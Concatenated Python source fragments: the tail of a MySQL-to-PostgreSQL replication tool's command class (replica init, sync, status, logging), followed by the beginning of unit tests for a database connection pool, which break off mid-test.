['pg_conn', 'sources', 'type_override']] connection_list = [item for item in self.config["pg_conn"] if item not in ['password']] type_override = pprint.pformat(self.config['type_override'], width = 20) tab_body = [] tab_headers = ['Parameter', 'Value'] for item in config_list: tab_row = [item, self.config[item]] tab_body.append(tab_row) for item in connection_list: tab_row = [item, self.config["pg_conn"][item]] tab_body.append(tab_row) tab_row = ['type_override', type_override] tab_body.append(tab_row) print(tabulate(tab_body, headers=tab_headers)) self.show_sources() def create_replica_schema(self): """ The method creates the replica schema in the destination database. """ self.logger.info("Trying to create replica schema") self.pg_engine.create_replica_schema() def drop_replica_schema(self): """ The method removes the replica schema from the destination database. """ self.logger.info("Dropping the replica schema") self.pg_engine.drop_replica_schema() def add_source(self): """ The method adds a new replication source. A pre existence check is performed """ if self.args.source == "*": print("You must specify a source name with the argument --source") else: self.logger.info("Trying to add a new source") self.pg_engine.add_source() def drop_source(self): """ The method removes a replication source from the catalogue. """ if self.args.source == "*": print("You must specify a source name with the argument --source") else: drp_msg = 'Dropping the source %s will remove drop any replica reference.\n Are you sure? YES/No\n' % self.args.source drop_src = input(drp_msg) if drop_src == 'YES': self.logger.info("Trying to remove the source") self.pg_engine.drop_source() elif drop_src in self.lst_yes: print('Please type YES all uppercase to confirm') def enable_replica(self): """ The method resets the source status to stopped and disables any leftover maintenance mode """ self.pg_engine.connect_db() self.pg_engine.set_source_status("stopped") self.pg_engine.end_maintenance() def copy_schema(self): """ The method calls init_replica adding a flag for skipping the data copy. Useful if we want to test for schema issues or to populate the schema preventively. """ self.mysql_source.copy_table_data=False self.init_replica() self.pg_engine.fk_metadata = self.mysql_source.get_foreign_keys_metadata() self.pg_engine.create_foreign_keys() def init_replica(self): """ The method initialise a replica for a given source and configuration. It is compulsory to specify a source name when running this method. The method checks the source type and calls the corresponding initialisation's method. """ if self.args.source == "*": print("You must specify a source name with the argument --source") elif self.args.tables != "*": print("You cannot specify a table name when running init_replica.") else: try: source_type = self.config["sources"][self.args.source]["type"] except KeyError: print("The source %s doesn't exists." % (self.args.source)) sys.exit() self.__stop_replica() if source_type == "mysql": self.__init_mysql_replica() elif source_type == "pgsql": self.__init_pgsql_replica() def __init_mysql_replica(self): """ The method initialise a replica for a given mysql source within the specified configuration. The method is called by the public method init_replica. """ if self.args.debug: self.mysql_source.init_replica() else: if self.config["log_dest"] == 'stdout': foreground = True else: foreground = False print("Process for source %s started." % (self.args.source)) keep_fds = [self.logger_fds] init_pid = os.path.expanduser('%s/%s.pid' % (self.config["pid_dir"],self.args.source)) self.logger.info("Initialising the replica for source %s" % self.args.source) init_daemon = Daemonize(app="init_replica", pid=init_pid, action=self.mysql_source.init_replica, foreground=foreground , keep_fds=keep_fds) init_daemon.start() def __init_pgsql_replica(self): """ The method initialise a replica for a given postgresql source within the specified configuration. The method is called by the public method init_replica. """ if self.args.debug: self.pgsql_source.init_replica() else: if self.config["log_dest"] == 'stdout': foreground = True else: foreground = False print("Process for source %s started." % (self.args.source)) keep_fds = [self.logger_fds] init_pid = os.path.expanduser('%s/%s.pid' % (self.config["pid_dir"],self.args.source)) self.logger.info("Initialising the replica for source %s" % self.args.source) init_daemon = Daemonize(app="init_replica", pid=init_pid, action=self.pgsql_source.init_replica, foreground=foreground , keep_fds=keep_fds) init_daemon.start() def refresh_schema(self): """ The method reload the data from a source and only for a specified schema. Is compulsory to specify a source name and an origin's schema name. The schema mappings are honoured by the procedure automatically. """ if self.args.source == "*": print("You must specify a source name using the argument --source") elif self.args.schema == "*": print("You must specify an origin's schema name using the argument --schema") else: self.__stop_replica() if self.args.debug: self.mysql_source.refresh_schema() else: if self.config["log_dest"] == 'stdout': foreground = True else: foreground = False print("Sync tables process for source %s started." % (self.args.source)) keep_fds = [self.logger_fds] init_pid = os.path.expanduser('%s/%s.pid' % (self.config["pid_dir"],self.args.source)) self.logger.info("The tables %s within source %s will be synced." % (self.args.tables, self.args.source)) sync_daemon = Daemonize(app="sync_tables", pid=init_pid, action=self.mysql_source.refresh_schema, foreground=foreground , keep_fds=keep_fds) sync_daemon .start() def sync_tables(self): """ The method reload the data from a source only for specified tables. Is compulsory to specify a source name and at least one table name when running this method. Multiple tables are allowed if comma separated. """ if self.args.source == "*": print("You must specify a source name using the argument --source") elif self.args.tables == "*": print("You must specify one or more tables, in the form schema.table, separated by comma using the argument --tables") else: self.__stop_replica() if self.args.debug: self.mysql_source.sync_tables() else: if self.config["log_dest"] == 'stdout': foreground = True else: foreground = False print("Sync tables process for source %s started." % (self.args.source)) keep_fds = [self.logger_fds] init_pid = os.path.expanduser('%s/%s.pid' % (self.config["pid_dir"],self.args.source)) self.logger.info("The tables %s within source %s will be synced." % (self.args.tables, self.args.source)) sync_daemon = Daemonize(app="sync_tables", pid=init_pid, action=self.mysql_source.sync_tables, foreground=foreground , keep_fds=keep_fds) sync_daemon .start() def __stop_all_active_sources(self): """ The method stops all the active sources within the target PostgreSQL database. """ active_source = self.pg_engine.get_active_sources() for source in active_source: self.source = source[0] self.__stop_replica() def upgrade_replica_schema(self): """ The method upgrades an existing replica catalogue to the newer version. If the catalogue is from the previous version """ catalog_version = self.pg_engine.get_catalog_version() if catalog_version == self.catalog_version: print("The replica catalogue is already up to date.") sys.exit() else: if catalog_version == self.upgradable_version: upg_msg = 'Upgrading the catalogue %s to the version %s.\n Are you sure? YES/No\n' % (catalog_version, self.catalog_version) upg_cat = input(upg_msg) if upg_cat == 'YES': self.logger.info("Performing the upgrade") self.pg_engine.upgrade_catalogue_v1() elif upg_cat in self.lst_yes: print('Please type YES all uppercase to confirm') elif catalog_version.split('.')[0] == '2' and catalog_version.split('.')[1] == '0': print('Stopping all the active sources.') self.__stop_all_active_sources() print('Upgrading the replica catalogue. ') self.pg_engine.upgrade_catalogue_v20() else: print('Wrong starting version. Expected %s, got %s' % (catalog_version, self.upgradable_version)) sys.exit() def update_schema_mappings(self): """ The method updates the schema mappings for the given source. The schema mappings is a configuration parameter but is stored in the replica catalogue when the source is added. If any change is made on the configuration file this method should be called to update the system catalogue as well. The pg_engine method checks for any conflict before running the update on the tables t_sources and t_replica_tables. Is compulsory to specify a source name when running this method. """ if self.args.source == "*": print("You must specify a source name with the argument --source") else: self.__stop_replica() self.pg_engine.update_schema_mappings() def read_replica(self, queue, log_read): """ The method reads the replica stream for the given source and stores the row images in the target postgresql database. """ if "keep_existing_schema" in self.config["sources"][self.args.source]: keep_existing_schema = self.config["sources"][self.args.source]["keep_existing_schema"] else: keep_existing_schema = False self.mysql_source.keep_existing_schema = keep_existing_schema self.mysql_source.logger = log_read[0] self.pg_engine.logger = log_read[0] while True: try: self.mysql_source.read_replica() time.sleep(self.sleep_loop) except Exception: queue.put(traceback.format_exc()) break def replay_replica(self, queue, log_replay): """ The method replays the row images stored in the target postgresql database. """ self.pg_engine.logger = log_replay[0] tables_error = [] self.pg_engine.connect_db() self.pg_engine.set_source_id() while True: try: tables_error = self.pg_engine.replay_replica() if len(tables_error) > 0: table_list = [item for sublist in tables_error for item in sublist] tables_removed = "\n".join(table_list) notifier_message = "There was an error during the replay of data. %s. The affected tables are no longer replicated." % (tables_removed) self.logger.error(notifier_message) self.notifier.send_message(notifier_message, 'error') except Exception: queue.put(traceback.format_exc()) break time.sleep(self.sleep_loop) def __run_replica(self): """ This method is the method which manages the two separate processes using the multiprocess library. It can be daemonised or run in foreground according with the --debug configuration or the log destination. """ if "auto_maintenance" not in self.config["sources"][self.args.source]: auto_maintenance = "disabled" else: auto_maintenance = self.config["sources"][self.args.source]["auto_maintenance"] if "gtid_enable" not in self.config["sources"][self.args.source]: gtid_enable = False else: gtid_enable = self.config["sources"][self.args.source]["gtid_enable"] self.mysql_source.gtid_enable = gtid_enable log_read = self.__init_logger("read") log_replay = self.__init_logger("replay") signal.signal(signal.SIGINT, self.terminate_replica) queue = mp.Queue() self.sleep_loop = self.config["sources"][self.args.source]["sleep_loop"] if self.args.debug: check_timeout = self.sleep_loop else: check_timeout = self.sleep_loop*10 self.logger.info("Starting the replica daemons for source %s " % (self.args.source)) self.read_daemon = mp.Process(target=self.read_replica, name='read_replica', daemon=True, args=(queue, log_read,)) self.replay_daemon = mp.Process(target=self.replay_replica, name='replay_replica', daemon=True, args=(queue, log_replay,)) self.read_daemon.start() self.replay_daemon.start() while True: read_alive = self.read_daemon.is_alive() replay_alive = self.replay_daemon.is_alive() if read_alive and replay_alive: self.logger.debug("Replica process for source %s is running" % (self.args.source)) self.pg_engine.cleanup_replayed_batches() else: stack_trace = queue.get() self.logger.error("Read process alive: %s - Replay process alive: %s" % (read_alive, replay_alive, )) self.logger.error("Stack trace: %s" % (stack_trace, )) if read_alive: self.read_daemon.terminate() self.logger.error("Replay daemon crashed. Terminating the read daemon.") if replay_alive: self.replay_daemon.terminate() self.logger.error("Read daemon crashed. Terminating the replay daemon.") if self.args.debug: replica_status = "stopped" else: replica_status = "error" try: self.pg_engine.connect_db() self.pg_engine.set_source_status(replica_status) except: pass notifier_message = "The replica process crashed.\n Source: %s\n Stack trace: %s " %(self.args.source, stack_trace) self.notifier.send_message(notifier_message, 'critical') break time.sleep(check_timeout) if auto_maintenance != "disabled": self.pg_engine.auto_maintenance = auto_maintenance self.pg_engine.connect_db() run_maintenance = self.pg_engine.check_auto_maintenance() self.pg_engine.disconnect_db() if run_maintenance: self.pg_engine.run_maintenance() self.logger.info("Replica process for source %s ended" % (self.args.source)) def start_replica(self): """ The method starts a new replica process. Is compulsory to specify a source name when running this method. """ replica_pid = os.path.expanduser('%s/%s.pid' % (self.config["pid_dir"],self.args.source)) if self.args.source == "*": print("You must specify a source name using the argument --source") else: self.pg_engine.connect_db() self.logger.info("Checking if the replica for source %s is stopped " % (self.args.source)) replica_status = self.pg_engine.get_replica_status() if replica_status in ['syncing', 'running', 'initialising']: print("The replica process is already started or is syncing. Aborting the command.") elif replica_status == 'error': print("The replica process is in error state.") print("You may need to check the replica status first. To enable it run the following command.") print("chameleon.py enable_replica --config %s --source %s " % (self.args.config, self.args.source)) else: self.logger.info("Cleaning not processed batches for source %s" % (self.args.source)) self.pg_engine.clean_not_processed_batches() self.pg_engine.disconnect_db() if self.args.debug: self.__run_replica() else: if self.config["log_dest"] == 'stdout': foreground = True else: foreground = False print("Starting the replica process for source %s" % (self.args.source)) keep_fds = [self.logger_fds] app_name = "%s_replica" % self.args.source replica_daemon = Daemonize(app=app_name, pid=replica_pid, action=self.__run_replica, foreground=foreground , keep_fds=keep_fds) try: replica_daemon.start() except: print("The replica process is already started. Aborting the command.") def __stop_replica(self): """ The method reads the pid of the replica process for the given self.source and sends a SIGINT which tells the replica process to manage a graceful exit. """ replica_pid = os.path.expanduser('%s/%s.pid' % (self.config["pid_dir"],self.source)) if os.path.isfile(replica_pid): try: file_pid=open(replica_pid,'r') pid=file_pid.read() file_pid.close() os.kill(int(pid),2) print("Requesting the replica for source %s to stop" % (self.source)) while True: try: os.kill(int(pid),0) except: break print("The replica process is stopped") except: print("An error occurred when trying to signal the replica process") def __set_conf_permissions(self, cham_dir): """ The method sets the permissions of the configuration directory to 700 :param cham_dir: the chameleon configuration directory to fix """ if os.path.isdir(cham_dir): os.chmod(cham_dir, 0o700) def stop_replica(self): """ The method calls the private method __stop_replica to stop the replica process. """ self.__stop_replica() def stop_all_replicas(self): """ The method stops all the active replicas within the target database """ self.__stop_all_active_sources() def show_errors(self): """ displays the error log entries if any. If the source the error log is filtered for this source only. """ log_id = self.args.logid self.pg_engine.source = self.args.source log_error_data = self.pg_engine.get_log_data(log_id) if log_error_data: if log_id != "*": tab_body = [] log_line = log_error_data[0] tab_body.append(['Log id', log_line[0]]) tab_body.append(['Source name', log_line[1]]) tab_body.append(['ID Batch', log_line[2]]) tab_body.append(['Table', log_line[3]]) tab_body.append(['Schema', log_line[4]]) tab_body.append(['Error timestamp', log_line[5]]) tab_body.append(['SQL executed', log_line[6]]) tab_body.append(['Error message', log_line[7]]) print(tabulate(tab_body, tablefmt="simple")) else: tab_headers = ['Log id', 'Source name', 'ID Batch', 'Table', 'Schema' , 'Error timestamp'] tab_body = [] for log_line in log_error_data: log_id = log_line[0] id_batch = log_line[1] source_name = log_line[2] table_name = log_line[3] schema_name = log_line[4] error_timestamp = log_line[5] tab_row = [log_id, id_batch,source_name, table_name, schema_name, error_timestamp] tab_body.append(tab_row) print(tabulate(tab_body, headers=tab_headers, tablefmt="simple")) else: print('There are no errors in the log') def show_status(self): """ list the replica status from the replica catalogue. If the source is specified gives some extra details on the source status. """ self.pg_engine.auto_maintenance = "disabled" if self.args.source != "*": if "auto_maintenance" in self.config["sources"][self.args.source]: self.pg_engine.auto_maintenance = self.config["sources"][self.args.source]["auto_maintenance"] self.pg_engine.source = self.args.source configuration_data = self.pg_engine.get_status() configuration_status = configuration_data[0] schema_mappings = configuration_data[1] table_status = configuration_data[2] replica_counters = configuration_data[3] tab_headers = ['Source id', 'Source name', 'Type', 'Status', 'Consistent' , 'Read lag', 'Last read', 'Replay lag' , 'Last replay'] tab_body = [] for status in configuration_status: source_id = status[0] source_name = status[1] source_status = status[2] read_lag = status[3] last_read = status[4] replay_lag = status[5] last_replay = status[6] consistent = status[7] source_type = status[8] last_maintenance = status[9] next_maintenance = status[10] tab_row = [source_id, source_name, source_type, source_status, consistent, read_lag, last_read, replay_lag, last_replay] tab_body.append(tab_row) print(tabulate(tab_body, headers=tab_headers, tablefmt="simple")) if schema_mappings: print('\n== Schema mappings ==') tab_headers = ['Origin schema', 'Destination schema'] tab_body = [] for mapping in schema_mappings: origin_schema = mapping[0] destination_schema= mapping[1] tab_row = [origin_schema, destination_schema] tab_body.append(tab_row) print(tabulate(tab_body, headers=tab_headers, tablefmt="simple")) if table_status: print('\n== Replica status ==') #tab_headers = ['', '', ''] tab_body = [] tables_no_replica = table_status[0] tab_row = ['Tables not replicated', tables_no_replica[1]] tab_body.append(tab_row) tables_with_replica = table_status[1] tab_row = ['Tables replicated', tables_with_replica[1]] tab_body.append(tab_row) tables_all= table_status[2] tab_row = ['All tables', tables_all[1]] tab_body.append(tab_row) tab_row = ['Last maintenance', last_maintenance] tab_body.append(tab_row) tab_row = ['Next maintenance', next_maintenance] tab_body.append(tab_row) if replica_counters: tab_row = ['Replayed rows', replica_counters[0]] tab_body.append(tab_row) tab_row = ['Replayed DDL', replica_counters[2]] tab_body.append(tab_row) tab_row = ['Skipped rows', replica_counters[1]] tab_body.append(tab_row) print(tabulate(tab_body, tablefmt="simple")) if tables_no_replica[2]: print('\n== Tables with replica disabled ==') print("\n".join(tables_no_replica[2])) def detach_replica(self): """ The method terminates the replica process. The source is removed from the table t_sources with all the associated data. The schema sequences in are reset to the max values in the corresponding tables, leaving the postgresql database as a standalone snapshot. The method creates the foreign keys existing in MySQL as well. Is compulsory to specify a source name when running this method. """ if self.args.source == "*": print("You must specify a source name with the argument --source") elif self.args.tables != "*": print("You cannot specify a table name when running detach_replica.") else: drp_msg = 'Detaching the replica will remove any reference for the source %s.\n Are you sure? YES/No\n' % self.args.source drop_src = input(drp_msg) if drop_src == 'YES': if "keep_existing_schema" in self.config["sources"][self.args.source]: keep_existing_schema = self.config["sources"][self.args.source]["keep_existing_schema"] else: keep_existing_schema = False self.pg_engine.keep_existing_schema = keep_existing_schema if not keep_existing_schema: self.pg_engine.fk_metadata = self.mysql_source.get_foreign_keys_metadata() self.__stop_replica() self.pg_engine.detach_replica() elif drop_src in self.lst_yes: print('Please type YES all uppercase to confirm') def run_maintenance(self): """ The method runs a maintenance process on the target postgresql database specified in the given source. """ maintenance_pid = os.path.expanduser('%s/%s_maintenance.pid' % (self.config["pid_dir"],self.args.source)) if self.args.source == "*": print("You must specify a source name with the argument --source") else: if self.args.debug: self.pg_engine.run_maintenance() else: if self.config["log_dest"] == 'stdout': foreground = True else: self.logger.info("Starting the maintenance on the source %s" % (self.args.source, )) foreground = False print("Starting the maintenance process for source %s" % (self.args.source)) keep_fds = [self.logger_fds] app_name = "%s_maintenance" % self.args.source maintenance_daemon = Daemonize(app=app_name, pid=maintenance_pid, action=self.pg_engine.run_maintenance, foreground=foreground , keep_fds=keep_fds) try: maintenance_daemon.start() except: print("The maintenance process is already started. Aborting the command.") def __init_logger(self, logger_name): """ The method initialise a new logger object using the configuration parameters. The formatter is different if the debug option is enabler or not. The method returns a new logger object and sets the logger's file descriptor in the class variable logger_fds, used when the process is demonised. :param logger_name: the name of the logger used to build the file name and get the correct logger :return: list with logger and file descriptor :rtype: list """ log_dir = self.config["log_dir"] log_level = self.config["log_level"] log_dest = self.config["log_dest"] log_days_keep = self.config["log_days_keep"] config_name = self.args.config source_name = self.args.source debug_mode = self.args.debug if source_name == '*': log_name = "%s_general" % (config_name) elif logger_name == "global": log_name = "%s_%s" % (config_name, source_name) else: log_name = "%s_%s_%s" % (config_name, source_name, logger_name) log_file = os.path.expanduser('%s/%s.log' % (log_dir,log_name)) logger = logging.getLogger(logger_name) logger.setLevel(logging.DEBUG) logger.propagate = False if debug_mode: str_format = "%(asctime)s %(processName)s %(levelname)s %(filename)s (%(lineno)s): %(message)s" else: str_format = "%(asctime)s %(processName)s %(levelname)s: %(message)s" formatter = logging.Formatter(str_format, "%Y-%m-%d %H:%M:%S") if log_dest=='stdout' or debug_mode: fh=logging.StreamHandler(sys.stdout) elif log_dest=='file': fh = TimedRotatingFileHandler(log_file, when="d",interval=1,backupCount=log_days_keep) if log_level=='debug' or debug_mode: fh.setLevel(logging.DEBUG) elif log_level=='info': fh.setLevel(logging.INFO) fh.setFormatter(formatter) logger.addHandler(fh) logger_fds = fh.stream.fileno() return [logger, logger_fds]
test_pooled_db.py
"""Test the PooledDB module. Note: We don't test performance here, so the test does not predicate whether PooledDB actually will help in improving performance or not. We also assume that the underlying SteadyDB connections are tested. Copyright and credit info: * This test was contributed by Christoph Zwerschke """ import unittest from . import mock_db as dbapi from dbutils.pooled_db import ( PooledDB, SharedDBConnection, InvalidConnection, TooManyConnections) class TestPooledDB(unittest.TestCase): def test_version(self): from dbutils import __version__, pooled_db self.assertEqual(pooled_db.__version__, __version__) self.assertEqual(PooledDB.version, __version__) def test_no_threadsafety(self): from dbutils.pooled_db import NotSupportedError for threadsafety in (None, 0): dbapi.threadsafety = threadsafety self.assertRaises(NotSupportedError, PooledDB, dbapi) def test_threadsafety(self): for threadsafety in (1, 2, 3): dbapi.threadsafety = threadsafety pool = PooledDB(dbapi, 0, 0, 1) self.assertTrue(hasattr(pool, '_maxshared')) if threadsafety > 1: self.assertEqual(pool._maxshared, 1) self.assertTrue(hasattr(pool, '_shared_cache')) else: self.assertEqual(pool._maxshared, 0) self.assertFalse(hasattr(pool, '_shared_cache')) def test_create_connection(self): for threadsafety in (1, 2): dbapi.threadsafety = threadsafety shareable = threadsafety > 1 pool = PooledDB( dbapi, 1, 1, 1, 0, False, None, None, True, None, None, 'PooledDBTestDB', user='PooledDBTestUser') self.assertTrue(hasattr(pool, '_idle_cache')) self.assertEqual(len(pool._idle_cache), 1) if shareable: self.assertTrue(hasattr(pool, '_shared_cache')) self.assertEqual(len(pool._shared_cache), 0) else: self.assertFalse(hasattr(pool, '_shared_cache')) self.assertTrue(hasattr(pool, '_maxusage')) self.assertIsNone(pool._maxusage) self.assertTrue(hasattr(pool, '_setsession')) self.assertIsNone(pool._setsession) con = pool._idle_cache[0] from dbutils.steady_db import SteadyDBConnection self.assertTrue(isinstance(con, SteadyDBConnection)) self.assertTrue(hasattr(con, '_maxusage')) self.assertEqual(con._maxusage, 0) self.assertTrue(hasattr(con, '_setsession_sql')) self.assertIsNone(con._setsession_sql) db = pool.connection() self.assertEqual(len(pool._idle_cache), 0) if shareable: self.assertEqual(len(pool._shared_cache), 1) self.assertTrue(hasattr(db, '_con')) self.assertEqual(db._con, con) self.assertTrue(hasattr(db, 'cursor')) self.assertTrue(hasattr(db, '_usage')) self.assertEqual(db._usage, 0) self.assertTrue(hasattr(con, '_con')) db_con = con._con self.assertTrue(hasattr(db_con, 'database')) self.assertEqual(db_con.database, 'PooledDBTestDB') self.assertTrue(hasattr(db_con, 'user')) self.assertEqual(db_con.user, 'PooledDBTestUser') self.assertTrue(hasattr(db_con, 'open_cursors')) self.assertEqual(db_con.open_cursors, 0) self.assertTrue(hasattr(db_con, 'num_uses')) self.assertEqual(db_con.num_uses, 0) self.assertTrue(hasattr(db_con, 'num_queries')) self.assertEqual(db_con.num_queries, 0) cursor = db.cursor() self.assertEqual(db_con.open_cursors, 1) cursor.execute('select test') r = cursor.fetchone() cursor.close() self.assertEqual(db_con.open_cursors, 0) self.assertEqual(r, 'test') self.assertEqual(db_con.num_queries, 1) self.assertEqual(db._usage, 1) cursor = db.cursor() self.assertEqual(db_con.open_cursors, 1) cursor.execute('set sessiontest') cursor2 = db.cursor() self.assertEqual(db_con.open_cursors, 2) cursor2.close() self.assertEqual(db_con.open_cursors, 1) cursor.close() self.assertEqual(db_con.open_cursors, 0) self.assertEqual(db_con.num_queries, 1) self.assertEqual(db._usage, 2) self.assertEqual( db_con.session, ['rollback', 'sessiontest']) pool = PooledDB(dbapi, 1, 1, 1) self.assertEqual(len(pool._idle_cache), 1) if shareable: self.assertEqual(len(pool._shared_cache), 0) db = pool.connection() self.assertEqual(len(pool._idle_cache), 0) if shareable: self.assertEqual(len(pool._shared_cache), 1) db.close() self.assertEqual(len(pool._idle_cache), 1) if shareable: self.assertEqual(len(pool._shared_cache), 0) db = pool.connection(True) self.assertEqual(len(pool._idle_cache), 0) if shareable: self.assertEqual(len(pool._shared_cache), 1) db.close() self.assertEqual(len(pool._idle_cache), 1) if shareable: self.assertEqual(len(pool._shared_cache), 0) db = pool.connection(False) self.assertEqual(len(pool._idle_cache), 0) if shareable: self.assertEqual(len(pool._shared_cache), 0) self.assertEqual(db._usage, 0) db_con = db._con._con self.assertIsNone(db_con.database) self.assertIsNone(db_con.user) db.close() self.assertEqual(len(pool._idle_cache), 1) if shareable: self.assertEqual(len(pool._shared_cache), 0) db = pool.dedicated_connection() self.assertEqual(len(pool._idle_cache), 0) if shareable: self.assertEqual(len(pool._shared_cache), 0) self.assertEqual(db._usage, 0) db_con = db._con._con self.assertIsNone(db_con.database) self.assertIsNone(db_con.user) db.close() self.assertEqual(len(pool._idle_cache), 1) if shareable: self.assertEqual(len(pool._shared_cache), 0) pool = PooledDB(dbapi, 0, 0, 0, 0, False, 3, ('set datestyle',)) self.assertEqual(pool._maxusage, 3) self.assertEqual(pool._setsession, ('set datestyle',)) con = pool.connection()._con self.assertEqual(con._maxusage, 3) self.assertEqual(con._setsession_sql, ('set datestyle',)) def test_close_connection(self): for threadsafety in (1, 2): dbapi.threadsafety = threadsafety shareable = threadsafety > 1 pool = PooledDB( dbapi, 0, 1, 1, 0, False, None, None, True, None, None, 'PooledDBTestDB', user='PooledDBTestUser') self.assertTrue(hasattr(pool, '_idle_cache')) self.assertEqual(len(pool._idle_cache), 0) db = pool.connection() self.assertTrue(hasattr(db, '_con')) con = db._con self.assertEqual(len(pool._idle_cache), 0) if shareable: self.assertEqual(len(pool._shared_cache), 1) self.assertTrue(hasattr(db, '_shared_con')) shared_con = db._shared_con self.assertEqual(pool._shared_cache[0], shared_con) self.assertTrue(hasattr(shared_con, 'shared')) self.assertEqual(shared_con.shared, 1) self.assertTrue(hasattr(shared_con, 'con')) self.assertEqual(shared_con.con, con) from dbutils.steady_db import SteadyDBConnection self.assertTrue(isinstance(con, SteadyDBConnection)) self.assertTrue(hasattr(con, '_con')) db_con = con._con self.assertTrue(hasattr(db_con, 'num_queries')) self.assertEqual(db._usage, 0) self.assertEqual(db_con.num_queries, 0) db.cursor().execute('select test') self.assertEqual(db._usage, 1) self.assertEqual(db_con.num_queries, 1) db.close() self.assertIsNone(db._con) if shareable: self.assertIsNone(db._shared_con) self.assertEqual(shared_con.shared, 0) self.assertRaises(InvalidConnection, getattr, db, '_usage') self.assertFalse(hasattr(db_con, '_num_queries')) self.assertEqual(len(pool._idle_cache), 1) self.assertEqual(pool._idle_cache[0]._con, db_con) if shareable: self.assertEqual(len(pool._shared_cache), 0) db.close() if shareable: self.assertEqual(shared_con.shared, 0) db = pool.connection() self.assertEqual(db._con, con) self.assertEqual(len(pool._idle_cache), 0) if shareable: self.assertEqual(len(pool._shared_cache), 1) shared_con = db._shared_con self.assertEqual(pool._shared_cache[0], shared_con) self.assertEqual(shared_con.con, con) self.assertEqual(shared_con.shared, 1) self.assertEqual(db._usage, 1) self.assertEqual(db_con.num_queries, 1) self.assertTrue(hasattr(db_con, 'database')) self.assertEqual(db_con.database, 'PooledDBTestDB') self.assertTrue(hasattr(db_con, 'user')) self.assertEqual(db_con.user, 'PooledDBTestUser') db.cursor().execute('select test') self.assertEqual(db_con.num_queries, 2) db.cursor().execute('select test') self.assertEqual(db_con.num_queries, 3) db.close() self.assertEqual(len(pool._idle_cache), 1) self.assertEqual(pool._idle_cache[0]._con, db_con) if shareable: self.assertEqual(len(pool._shared_cache), 0) db = pool.connection(False) self.assertEqual(db._con, con) self.assertEqual(len(pool._idle_cache), 0) if shareable: self.assertEqual(len(pool._shared_cache), 0) db.close() self.assertEqual(len(pool._idle_cache), 1) if shareable: self.assertEqual(len(pool._shared_cache), 0) def test_close_all(self): for threadsafety in (1, 2): dbapi.threadsafety = threadsafety shareable = threadsafety > 1 pool = PooledDB(dbapi, 10) self.assertEqual(len(pool._idle_cache), 10) pool.close() self.assertEqual(len(pool._idle_cache), 0) pool = PooledDB(dbapi, 10) closed = ['no'] def close(what=closed): what[0] = 'yes' pool._idle_cache[7]._con.close = close self.assertEqual(closed, ['no']) del pool self.assertEqual(closed, ['yes']) pool = PooledDB(dbapi, 10, 10, 5) self.assertEqual(len(pool._idle_cache), 10) if shareable: self.assertEqual(len(pool._shared_cache), 0) cache = [] for i in range(5): cache.append(pool.connection()) self.assertEqual(len(pool._idle_cache), 5) if shareable: self.assertEqual(len(pool._shared_cache), 5) else: self.assertEqual(len(pool._idle_cache), 5) pool.close() self.assertEqual(len(pool._idle_cache), 0) if shareable: self.assertEqual(len(pool._shared_cache), 0) pool = PooledDB(dbapi, 10, 10, 5) closed = [] def close_idle(what=closed): what.append('idle') def close_shared(what=closed): what.append('shared') if shareable: cache = [] for i in range(5): cache.append(pool.connection()) pool._shared_cache[3].con.close = close_shared else: pool._idle_cache[7]._con.close = close_shared pool._idle_cache[3]._con.close = close_idle self.assertEqual(closed, []) del pool if shareable: del cache self.assertEqual(closed, ['idle', 'shared']) def test_shareable_connection(self): for threadsafety in (1, 2): dbapi.threadsafety = threadsafety shareable = threadsafety > 1 pool = PooledDB(dbapi, 0, 1, 2) self.assertEqual(len(pool._idle_cache), 0) if shareable: self.assertEqual(len(pool._shared_cache), 0) db1 = pool.connection() self.assertEqual(len(pool._idle_cache), 0) if shareable: self.assertEqual(len(pool._shared_cache), 1) db2 = pool.connection() self.assertNotEqual(db1._con, db2._con) self.assertEqual(len(pool._idle_cache), 0) if shareable: self.assertEqual(len(pool._shared_cache), 2) db3 = pool.connection() self.assertEqual(len(pool._idle_cache), 0) if shareable: self.assertEqual(len(pool._shared_cache), 2) self.assertEqual(db3._con, db1._con) self.assertEqual(db1._shared_con.shared, 2) self.assertEqual(db2._shared_con.shared, 1) else: self.assertNotEqual(db3._con, db1._con) self.assertNotEqual(db3._con, db2._con) db4 = pool.connection() self.assertEqual(len(pool._idle_cache), 0) if shareable: self.assertEqual(len(pool._shared_cache), 2) self.assertEqual(db4._con, db2._con) self.assertEqual(db1._shared_con.shared, 2) self.assertEqual(db2._shared_con.shared, 2) else: self.assertNotEqual(db4._con, db1._con) self.assertNotEqual(db4._con, db2._con) self.assertNotEqual(db4._con, db3._con) db5 = pool.connection(False) self.assertNotEqual(db5._con, db1._con) self.assertNotEqual(db5._con, db2._con) self.assertNotEqual(db5._con, db3._con) self.assertNotEqual(db5._con, db4._con) self.assertEqual(len(pool._idle_cache), 0) if shareable: self.assertEqual(len(pool._shared_cache), 2) self.assertEqual(db1._shared_con.shared, 2) self.assertEqual(db2._shared_con.shared, 2) db5.close() self.assertEqual(len(pool._idle_cache), 1) db5 = pool.connection() if shareable: self.assertEqual(len(pool._idle_cache), 1) self.assertEqual(len(pool._shared_cache), 2) self.assertEqual(db5._shared_con.shared, 3) else: self.assertEqual(len(pool._idle_cache), 0) pool = PooledDB(dbapi, 0, 0, 1) self.assertEqual(len(pool._idle_cache), 0) db1 = pool.connection(False) if shareable: self.assertEqual(len(pool._shared_cache), 0) db2 = pool.connection() if shareable: self.assertEqual(len(pool._shared_cache), 1) db3 = pool.connection() if shareable: self.assertEqual(len(pool._shared_cache), 1) self.assertEqual(db2._con, db3._con) else: self.assertNotEqual(db2._con, db3._con) del db3 if shareable: self.assertEqual(len(pool._idle_cache), 0) self.assertEqual(len(pool._shared_cache), 1) else: self.assertEqual(len(pool._idle_cache), 1) del db2 if shareable: self.assertEqual(len(pool._idle_cache), 1) self.assertEqual(len(pool._shared_cache), 0) else: self.assertEqual(len(pool._idle_cache), 2) del db1 if shareable: self.assertEqual(len(pool._idle_cache), 2) self.assertEqual(len(pool._shared_cache), 0) else: self.assertEqual(len(pool._idle_cache), 3) def test_min_max_cached(self): for threadsafety in (1, 2): dbapi.threadsafety = threadsafety shareable = threadsafety > 1 pool = PooledDB(dbapi, 3) self.assertEqual(len(pool._idle_cache), 3) cache = [pool.connection() for i in range(3)] self.assertEqual(len(pool._idle_cache), 0) del cache self.assertEqual(len(pool._idle_cache), 3) cache = [pool.connection() for i in range(6)] self.assertEqual(len(pool._idle_cache), 0) del cache self.assertEqual(len(pool._idle_cache), 6) pool = PooledDB(dbapi, 0, 3) self.assertEqual(len(pool._idle_cache), 0) cache = [pool.connection() for i in range(3)] self.assertEqual(len(pool._idle_cache), 0) del cache self.assertEqual(len(pool._idle_cache), 